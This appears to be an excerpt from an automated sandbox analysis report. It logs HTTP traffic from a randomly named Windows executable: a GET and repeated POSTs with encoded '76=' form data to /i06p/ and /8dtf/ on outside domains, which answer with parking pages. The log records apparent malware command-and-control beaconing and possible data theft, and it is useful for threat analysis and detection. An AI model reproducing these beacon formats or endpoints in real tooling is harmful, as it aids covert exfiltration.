                                Sep 23, 2024 14:38:59.632251978 CEST477OUTGET /i06p/?76=Vpg7jNNJFscOYvB4AFVvnCABD6vaG9WwQKsmOhPgVM6zGb6O3kTWptBkzi24RSKPCbgQwpMWpgmK77FhrxpjTuP7OZT72bn7m/6/2woT1FIIWI10rq/bHfXKD/PO7OFh2Gu8aqkRsDAe&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.deefbank.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:39:00.363027096 CEST560INHTTP/1.1 301 Moved Permanently
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 23 Sep 2024 12:39:00 GMT
                                Location: https://www.deefbank.net/i06p/?76=Vpg7jNNJFscOYvB4AFVvnCABD6vaG9WwQKsmOhPgVM6zGb6O3kTWptBkzi24RSKPCbgQwpMWpgmK77FhrxpjTuP7OZT72bn7m/6/2woT1FIIWI10rq/bHfXKD/PO7OFh2Gu8aqkRsDAe&mtJD_=fvdlJ2L
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                33192.168.2.749737199.59.243.227803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:13.543255091 CEST767OUTPOST /8dtf/ HTTP/1.1
                                Host: www.donante-de-ovulos.biz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.donante-de-ovulos.biz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.donante-de-ovulos.biz/8dtf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 71 36 72 48 35 31 56 79 42 44 56 58 46 76 39 6b 71 77 4c 30 47 2b 65 4f 64 6b 55 45 37 2f 70 51 52 65 58 76 39 51 32 35 50 31 4a 67 6a 68 34 5a 41 35 57 34 61 53 36 4c 64 53 7a 49 73 50 32 65 34 65 4a 74 4e 6b 51 52 75 4a 2b 69 39 55 76 69 56 72 42 7a 4c 75 74 34 63 49 56 69 4c 4b 76 34 54 32 6f 77 62 5a 45 42 32 57 4c 4d 73 67 64 32 6c 53 76 4b 64 30 48 6d 47 43 6f 74 61 59 33 68 33 50 67 38 53 78 73 72 4d 75 39 50 70 55 46 50 79 6c 50 48 41 39 76 32 46 44 64 59 61 48 4f 4e 65 78 33 72 74 62 4b 4f 7a 6f 34 58 6d 68 67 48 76 70 6c 4d 69 52 77 43 4f 68 35 46 35 6f 30 70 6b 64 79 63 76 70 36 4a 4f 75 7a 59 61 7a 53 72 47 51 3d 3d
                                Data Ascii: 76=q6rH51VyBDVXFv9kqwL0G+eOdkUE7/pQReXv9Q25P1Jgjh4ZA5W4aS6LdSzIsP2e4eJtNkQRuJ+i9UviVrBzLut4cIViLKv4T2owbZEB2WLMsgd2lSvKd0HmGCotaY3h3Pg8SxsrMu9PpUFPylPHA9v2FDdYaHONex3rtbKOzo4XmhgHvplMiRwCOh5F5o0pkdycvp6JOuzYazSrGQ==
                                Sep 23, 2024 14:39:14.931289911 CEST1236INHTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
                                x-request-id: af745696-d0cd-4616-9ea0-1243abf84ffc
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=af745696-d0cd-4616-9ea0-1243abf84ffc; expires=Mon, 23 Sep 2024 12:54:13 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 54 43 44 2f 4e 49 35 54 47 4f 50 64 45 6e 51 75 6b 49 44 68 35 42 50 2f 54 6e 64 73 2f 49 44 4a 56 4d 52 58 45 6e 5a 38 58 2f 31 6d 38 2f 66 38 41 4f 55 6b 56 35 52 5a 43 44 39 70 61 6a 74 53 51 42 59 76 55 31 78 64 30 76 4f 33 7a 37 52 56 73 4b 79 33 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Sep 23, 2024 14:39:14.931310892 CEST603INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWY3NDU2OTYtZDBjZC00NjE2LTllYTAtMTI0M2FiZjg0ZmZjIiwicGFnZV90aW1lIjoxNzI3MDk1MT
                                Sep 23, 2024 14:39:14.931551933 CEST1236INHTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
                                x-request-id: af745696-d0cd-4616-9ea0-1243abf84ffc
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=af745696-d0cd-4616-9ea0-1243abf84ffc; expires=Mon, 23 Sep 2024 12:54:13 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 54 43 44 2f 4e 49 35 54 47 4f 50 64 45 6e 51 75 6b 49 44 68 35 42 50 2f 54 6e 64 73 2f 49 44 4a 56 4d 52 58 45 6e 5a 38 58 2f 31 6d 38 2f 66 38 41 4f 55 6b 56 35 52 5a 43 44 39 70 61 6a 74 53 51 42 59 76 55 31 78 64 30 76 4f 33 7a 37 52 56 73 4b 79 33 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Sep 23, 2024 14:39:14.931922913 CEST1236INHTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
                                x-request-id: af745696-d0cd-4616-9ea0-1243abf84ffc
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=af745696-d0cd-4616-9ea0-1243abf84ffc; expires=Mon, 23 Sep 2024 12:54:13 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 54 43 44 2f 4e 49 35 54 47 4f 50 64 45 6e 51 75 6b 49 44 68 35 42 50 2f 54 6e 64 73 2f 49 44 4a 56 4d 52 58 45 6e 5a 38 58 2f 31 6d 38 2f 66 38 41 4f 55 6b 56 35 52 5a 43 44 39 70 61 6a 74 53 51 42 59 76 55 31 78 64 30 76 4f 33 7a 37 52 56 73 4b 79 33 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                34192.168.2.749738199.59.243.227803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:16.081939936 CEST787OUTPOST /8dtf/ HTTP/1.1
                                Host: www.donante-de-ovulos.biz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.donante-de-ovulos.biz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.donante-de-ovulos.biz/8dtf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 71 36 72 48 35 31 56 79 42 44 56 58 48 50 4e 6b 6f 54 54 30 44 65 65 50 52 45 55 45 69 50 70 71 52 5a 66 76 39 52 69 70 4d 48 39 67 6a 45 45 5a 4f 62 75 34 64 53 36 4c 50 79 7a 52 69 76 33 63 34 65 46 50 4e 6d 45 52 75 4a 61 69 39 55 66 69 57 59 5a 79 4c 2b 74 2b 45 34 56 67 55 61 76 34 54 32 6f 77 62 5a 42 63 32 57 54 4d 73 7a 46 32 71 51 48 4c 65 30 48 35 52 79 6f 74 58 34 32 6f 33 50 67 4f 53 77 77 42 4d 74 46 50 70 57 4e 50 79 30 4f 52 4f 39 76 77 61 54 63 54 63 45 72 6b 59 55 4c 79 72 36 79 31 7a 76 6b 42 75 33 39 6c 31 4c 70 67 38 41 49 35 4b 6a 64 7a 75 4f 70 63 6d 63 32 45 69 4c 4f 6f 52 5a 57 79 58 68 7a 76 51 76 6e 53 78 76 49 67 6d 57 61 6a 56 2f 2b 6e 6c 76 6b 53 5a 73 73 3d
                                Data Ascii: 76=q6rH51VyBDVXHPNkoTT0DeePREUEiPpqRZfv9RipMH9gjEEZObu4dS6LPyzRiv3c4eFPNmERuJai9UfiWYZyL+t+E4VgUav4T2owbZBc2WTMszF2qQHLe0H5RyotX42o3PgOSwwBMtFPpWNPy0ORO9vwaTcTcErkYULyr6y1zvkBu39l1Lpg8AI5KjdzuOpcmc2EiLOoRZWyXhzvQvnSxvIgmWajV/+nlvkSZss=
                                Sep 23, 2024 14:39:16.524482012 CEST1236INHTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:16 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
                                x-request-id: fc0da03a-ca55-43a0-ab06-64aca8ff0363
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=fc0da03a-ca55-43a0-ab06-64aca8ff0363; expires=Mon, 23 Sep 2024 12:54:16 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 54 43 44 2f 4e 49 35 54 47 4f 50 64 45 6e 51 75 6b 49 44 68 35 42 50 2f 54 6e 64 73 2f 49 44 4a 56 4d 52 58 45 6e 5a 38 58 2f 31 6d 38 2f 66 38 41 4f 55 6b 56 35 52 5a 43 44 39 70 61 6a 74 53 51 42 59 76 55 31 78 64 30 76 4f 33 7a 37 52 56 73 4b 79 33 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Sep 23, 2024 14:39:16.524501085 CEST603INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmMwZGEwM2EtY2E1NS00M2EwLWFiMDYtNjRhY2E4ZmYwMzYzIiwicGFnZV90aW1lIjoxNzI3MDk1MT


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                35192.168.2.749739199.59.243.227803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:18.629132032 CEST1800OUTPOST /8dtf/ HTTP/1.1
                                Host: www.donante-de-ovulos.biz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.donante-de-ovulos.biz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.donante-de-ovulos.biz/8dtf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 71 36 72 48 35 31 56 79 42 44 56 58 48 50 4e 6b 6f 54 54 30 44 65 65 50 52 45 55 45 69 50 70 71 52 5a 66 76 39 52 69 70 4d 48 46 67 69 79 77 5a 42 63 43 34 63 53 36 4c 55 79 7a 4d 69 76 32 45 34 65 74 4c 4e 6d 49 42 75 4c 79 69 39 33 6e 69 64 4a 5a 79 46 2b 74 2b 59 49 56 68 4c 4b 75 79 54 32 35 35 62 5a 52 63 32 57 54 4d 73 79 31 32 74 43 76 4c 53 55 48 6d 47 43 6f 66 61 59 32 41 33 4f 49 30 53 77 30 37 4d 39 6c 50 70 31 6c 50 68 57 6d 52 52 4e 76 79 5a 54 63 41 63 45 58 2f 59 51 6a 55 72 36 48 51 7a 6f 49 42 34 54 77 59 67 4c 39 71 2b 52 45 64 4e 6c 4e 71 6a 73 74 7a 2b 73 2b 4d 38 35 61 4a 52 4a 36 61 5a 6a 66 33 5a 6f 72 53 73 65 41 30 6e 47 75 4c 61 49 58 4c 68 66 6b 43 4d 6f 57 4d 59 5a 47 39 69 39 46 6b 41 56 43 73 64 38 6f 59 2f 35 58 75 45 6b 39 31 50 6e 56 65 64 6b 32 6e 63 69 6c 69 45 45 73 6e 73 6b 6a 53 75 59 38 6c 75 72 72 2f 48 49 76 57 39 42 68 66 46 59 6b 68 33 32 36 4a 51 79 53 35 68 33 57 34 4e 71 66 34 75 70 33 64 51 69 64 65 45 46 69 77 4b 38 57 62 70 6a 55 70 5a 36 4b [TRUNCATED]
                                Data Ascii: 76=q6rH51VyBDVXHPNkoTT0DeePREUEiPpqRZfv9RipMHFgiywZBcC4cS6LUyzMiv2E4etLNmIBuLyi93nidJZyF+t+YIVhLKuyT255bZRc2WTMsy12tCvLSUHmGCofaY2A3OI0Sw07M9lPp1lPhWmRRNvyZTcAcEX/YQjUr6HQzoIB4TwYgL9q+REdNlNqjstz+s+M85aJRJ6aZjf3ZorSseA0nGuLaIXLhfkCMoWMYZG9i9FkAVCsd8oY/5XuEk91PnVedk2nciliEEsnskjSuY8lurr/HIvW9BhfFYkh326JQyS5h3W4Nqf4up3dQideEFiwK8WbpjUpZ6KRir8bm6xGOC4iMc/oksxudiAGk+w8G2WUdo2rVFW2ZuDa3ltFImfBkPpLwMUTLAGxM1LAvQs8cASGs8JkY84cqGXLUFJmRIV1oONT20lgM7XIyWvKRDswXNgDvGlTZAqKchvpEtBK9m/A03QwA28IjN7ZXQKzFdH8cllLnH2xJoxhtF0HxcYW9jnPgeqlmvSvfPEwxfDIkvMlry/FwasNwtPmhG/utZVl6X1LPEXxVOqXme2bODfyYJ/wjclxsCfU1Exf8FsdbLPcL8fDsmujbHT2dUpmZ/iLlBG2M2wtbzqrhURN9lpJ8TvmR5B7bdDib4KbggzyjDEsyudsidE77V+zUMG5T9OeINAsYN3/C0bywhdFknBwEMN4O5CgD8APtG95rRT42UEXBLP91es5aI9YoEGN0BvjUz050RTxbBDMMe6JO/3Cj1MKbYO2GAczF8EbAbbH9OKFwrmnSnlBN0+VupNEfHxLC9d6Srtcv1M8WZHHYMEbCjvFhmMESqLOH+UVVp4cMLYS6kt7JOfZ4iTq8H/0HXxmOmYYLEhfsd2AOWb6yTF86nnTwCFJGsPEkTv74aYMAk5IR9wgs6uNSRcJQfmPhoLRoYYT2tGkjewa6T+VUZwSISbMC5OVCF+F6o7IzP/8WDNJ+TK0hDzUDY9zfjf9wEKuC [TRUNCATED]
                                Sep 23, 2024 14:39:19.083872080 CEST1236INHTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:18 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
                                x-request-id: 8a32c0d7-070b-412c-880a-6d5e75c42955
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=8a32c0d7-070b-412c-880a-6d5e75c42955; expires=Mon, 23 Sep 2024 12:54:19 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 54 43 44 2f 4e 49 35 54 47 4f 50 64 45 6e 51 75 6b 49 44 68 35 42 50 2f 54 6e 64 73 2f 49 44 4a 56 4d 52 58 45 6e 5a 38 58 2f 31 6d 38 2f 66 38 41 4f 55 6b 56 35 52 5a 43 44 39 70 61 6a 74 53 51 42 59 76 55 31 78 64 30 76 4f 33 7a 37 52 56 73 4b 79 33 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
